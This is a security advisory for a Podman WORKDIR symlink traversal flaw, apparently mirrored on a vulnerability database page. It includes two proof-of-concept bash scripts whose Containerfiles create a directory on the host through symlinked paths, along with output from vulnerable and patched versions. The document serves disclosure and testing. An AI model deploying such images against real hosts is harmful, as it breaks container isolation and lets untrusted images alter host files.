GHSA-Q6R4-3WMG-FWCQ

Vulnerability from github – Published: 2026-06-18 14:28 – Updated: 2026-06-18 14:28
VLAI
Summary
Podman: WORKDIR symlink traversal vulnerability
Details

Summary

Running a malicous container image where the WORKDIR path contains a symlink can create a directory or modify ownership on the host filesystem. Modified ownership is less likely to happen as that requires help from an untrusted/malicious process that mutates the host filesystem tree during dereferencing of the WORKDIR path, to trigger a race condition.

Patch

https://github.com/podman-container-tools/podman/commit/d18e44e9abb3bf5b7294aa70806e1368fdddfdd0

Details

This issue was fixed in podman 5.7.1 (git commit 7ce2e00ab140c11a68301f0b161f51984131a858)

PoC

The reproducer script test1.bash demonstrates the vulnerability. The directory /var/BREAKOUT is created on the host. The container process uses the container directory /var/BREAKOUT as current working directory.

The reproducer script test2.bash demonstrates the same vulnerability. The directory /var/BREAKOUT is created on the host. The container process uses the container directory /usr/local as current working directory.

The reproducer script test2.bash shows that the working directory can be different from the breakout directory.

Reproducer test1.bash

#!/bin/bash
set -o errexit
set -o nounset

if [ -e /var/BREAKOUT ]; then
  echo error: path /var/BREAKOUT should not exist beforehand
  exit 1
fi

dir=$(mktemp -d)
cat > $dir/Containerfile << 'EOF'
FROM docker.io/library/alpine
RUN cd / && ln -s ../../../../../../../var symlink
USER 1234:1234
WORKDIR /symlink/BREAKOUT
CMD ["/bin/sh","-c","echo current working directory: $(pwd)"]
EOF

podman build -q --no-cache -t img $dir
podman run --rm localhost/img
ls -ld /var/BREAKOUT

Reproducer test2.bash

#!/bin/bash
set -o errexit
set -o nounset

if [ -e /var/BREAKOUT ]; then
  echo error: path /var/BREAKOUT should not exist beforehand
  exit 1
fi

dir=$(mktemp -d)
cat > $dir/Containerfile << 'EOF'
FROM docker.io/library/alpine
ARG breakout_dirname=/var
ARG breakout_basename=BREAKOUT
ARG produce_pwd=/usr/local
RUN mkdir -p /0/1/2/3 && \
    cd /0 && \
    ln -s 1/2/3 symlink1 && \
    mkdir -p /0/1/symlink2/${breakout_dirname} && \
    cd /0/1/symlink2/${breakout_dirname} && \
    ln -s ${produce_pwd} ${breakout_basename}
RUN cd / && ln -s ../../../../../../.. symlink2
USER 1234:1234
WORKDIR /0/symlink1/../../symlink2/${breakout_dirname}/${breakout_basename}
CMD ["/bin/sh","-c","echo current working directory: $(pwd)"]
EOF

podman build -q --no-cache -t img $dir
podman run --rm localhost/img
ls -ld /var/BREAKOUT

Vulnerable:

podman 5.7.0 using Fedora CoreOS 43.20251120.3.0

root@localhost:~# bash test1.bash 
38c27b69c61941741f49c3f87b589b422391d5908659665cabf248934be0ed80
current working directory: /var/BREAKOUT
drwxr-xr-x. 2 1234 1234 6 May 29 19:28 /var/BREAKOUT
root@localhost:~# rmdir /var/BREAKOUT/
root@localhost:~# bash test2.bash 
c3390edbe393a3f3b182e60c5900cf93444b5120fbe34dc305478b3b77a106c9
current working directory: /usr/local
drwxr-xr-x. 2 1234 1234 6 May 29 19:28 /var/BREAKOUT

Not vulnerable:

podman 5.7.1 using Fedora CoreOS 43.20260119.1.1

root@localhost:~# bash test1.bash 
0229bf752a821d5b9bb8afcf4b94e8de2a4838798ae8065414b7f939b81d0788
current working directory: /var/BREAKOUT
ls: cannot access '/var/BREAKOUT': No such file or directory
root@localhost:~# bash test2.bash 
568584150a93a003feb8ae1985173bf50ced9cba4d52f9734cb70dc75eeb7c60
current working directory: /usr/local
ls: cannot access '/var/BREAKOUT': No such file or directory

Credits

We like to thank Erik Sjölund (@eriksjolund) for reporting the security impact to us.

Severity
5.3 (Medium)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 5.7.0"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/containers/podman/v5"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.7.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/containers/podman/v4"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "4.9.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/containers/podman/v3"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "3.4.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-55686"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-18T14:28:26Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nRunning a malicous container image where the WORKDIR path contains a symlink can create a directory or modify ownership on the host filesystem. Modified ownership is less likely to happen as that requires help from an untrusted/malicious process that mutates the host filesystem tree during dereferencing of the WORKDIR path, to trigger a race condition.\n\n### Patch\n\nhttps://github.com/podman-container-tools/podman/commit/d18e44e9abb3bf5b7294aa70806e1368fdddfdd0\n\n### Details\n\nThis issue was fixed in podman 5.7.1 (git commit 7ce2e00ab140c11a68301f0b161f51984131a858)\n\n### PoC\n\nThe reproducer script _test1.bash_ demonstrates the vulnerability. \nThe directory  `/var/BREAKOUT` is created on the host.\nThe container process uses the container directory `/var/BREAKOUT` as current working directory.\n\nThe reproducer script _test2.bash_ demonstrates the same vulnerability. \nThe directory  `/var/BREAKOUT` is created on the host.\nThe container process uses the container directory `/usr/local` as current working directory.\n\nThe reproducer script _test2.bash_ shows that the working directory can be different from the breakout directory.\n\nReproducer **test1.bash**\n\n```\n#!/bin/bash\nset -o errexit\nset -o nounset\n\nif [ -e /var/BREAKOUT ]; then\n  echo error: path /var/BREAKOUT should not exist beforehand\n  exit 1\nfi\n\ndir=$(mktemp -d)\ncat \u003e $dir/Containerfile \u003c\u003c \u0027EOF\u0027\nFROM docker.io/library/alpine\nRUN cd / \u0026\u0026 ln -s ../../../../../../../var symlink\nUSER 1234:1234\nWORKDIR /symlink/BREAKOUT\nCMD [\"/bin/sh\",\"-c\",\"echo current working directory: $(pwd)\"]\nEOF\n\npodman build -q --no-cache -t img $dir\npodman run --rm localhost/img\nls -ld /var/BREAKOUT\n```\n\n\nReproducer **test2.bash**\n\n```\n#!/bin/bash\nset -o errexit\nset -o nounset\n\nif [ -e /var/BREAKOUT ]; then\n  echo error: path /var/BREAKOUT should not exist beforehand\n  exit 1\nfi\n\ndir=$(mktemp -d)\ncat \u003e $dir/Containerfile \u003c\u003c \u0027EOF\u0027\nFROM docker.io/library/alpine\nARG breakout_dirname=/var\nARG breakout_basename=BREAKOUT\nARG produce_pwd=/usr/local\nRUN mkdir -p /0/1/2/3 \u0026\u0026 \\\n    cd /0 \u0026\u0026 \\\n    ln -s 1/2/3 symlink1 \u0026\u0026 \\\n    mkdir -p /0/1/symlink2/${breakout_dirname} \u0026\u0026 \\\n    cd /0/1/symlink2/${breakout_dirname} \u0026\u0026 \\\n    ln -s ${produce_pwd} ${breakout_basename}\nRUN cd / \u0026\u0026 ln -s ../../../../../../.. symlink2\nUSER 1234:1234\nWORKDIR /0/symlink1/../../symlink2/${breakout_dirname}/${breakout_basename}\nCMD [\"/bin/sh\",\"-c\",\"echo current working directory: $(pwd)\"]\nEOF\n\npodman build -q --no-cache -t img $dir\npodman run --rm localhost/img\nls -ld /var/BREAKOUT\n```\n\n\n\nVulnerable:\n\npodman 5.7.0 using Fedora CoreOS 43.20251120.3.0\n\n```\nroot@localhost:~# bash test1.bash \n38c27b69c61941741f49c3f87b589b422391d5908659665cabf248934be0ed80\ncurrent working directory: /var/BREAKOUT\ndrwxr-xr-x. 2 1234 1234 6 May 29 19:28 /var/BREAKOUT\nroot@localhost:~# rmdir /var/BREAKOUT/\nroot@localhost:~# bash test2.bash \nc3390edbe393a3f3b182e60c5900cf93444b5120fbe34dc305478b3b77a106c9\ncurrent working directory: /usr/local\ndrwxr-xr-x. 2 1234 1234 6 May 29 19:28 /var/BREAKOUT\n```\n\nNot vulnerable:\n\npodman 5.7.1 using Fedora CoreOS 43.20260119.1.1\n\n```\nroot@localhost:~# bash test1.bash \n0229bf752a821d5b9bb8afcf4b94e8de2a4838798ae8065414b7f939b81d0788\ncurrent working directory: /var/BREAKOUT\nls: cannot access \u0027/var/BREAKOUT\u0027: No such file or directory\nroot@localhost:~# bash test2.bash \n568584150a93a003feb8ae1985173bf50ced9cba4d52f9734cb70dc75eeb7c60\ncurrent working directory: /usr/local\nls: cannot access \u0027/var/BREAKOUT\u0027: No such file or directory\n```\n\n### Credits\n\nWe like to thank Erik Sj\u00f6lund (@eriksjolund) for reporting the security impact to us.",
  "id": "GHSA-q6r4-3wmg-fwcq",
  "modified": "2026-06-18T14:28:26Z",
  "published": "2026-06-18T14:28:26Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/podman-container-tools/podman/security/advisories/GHSA-q6r4-3wmg-fwcq"
    },
    {
      "type": "WEB",
      "url": "https://github.com/podman-container-tools/podman/commit/7ce2e00ab140c11a68301f0b161f51984131a858"
    },
    {
      "type": "WEB",
      "url": "https://github.com/podman-container-tools/podman/commit/d18e44e9abb3bf5b7294aa70806e1368fdddfdd0"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/podman-container-tools/podman"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Podman: WORKDIR symlink traversal vulnerability"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.





Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Detection rules are retrieved from Rulezet.